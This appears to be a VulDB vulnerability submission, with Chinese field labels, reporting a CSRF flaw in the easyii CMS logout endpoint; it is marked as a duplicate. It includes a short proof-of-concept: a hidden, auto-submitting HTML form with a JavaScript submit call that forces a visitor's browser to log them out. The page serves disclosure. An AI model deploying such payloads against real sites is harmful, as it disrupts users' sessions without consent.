| 标题 | CSRF in easyii CMS logout |
|---|
| 描述 | can force logout any user with vulnerable endpoint: http://example.com/admin/sign/out
and automate with auto submit form
<form method='GET' action='http://example.com/admin/sign/out' target="csrf-frame" id="csrf-form">
<input type='hidden' name='criticaltoggle' value='true'>
<input style="display:none;" type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>
|
|---|
| 来源 | ⚠️ https://github.com/noumo/easyii/ |
|---|
| 用户 | rezaduty (UID 10530) |
|---|
| 提交 | 2020-08-25 17時22分 (6 年前) |
|---|
| 管理 | 2020-08-26 09時52分 (17 hours later) |
|---|
| 状态 | 重复 |
|---|
| VulDB条目 | 160278 [easyii CMS /admin/sign/out 跨网站请求伪造] |
|---|
| 原因 | duplicate |
|---|
| 积分 | 0 |
|---|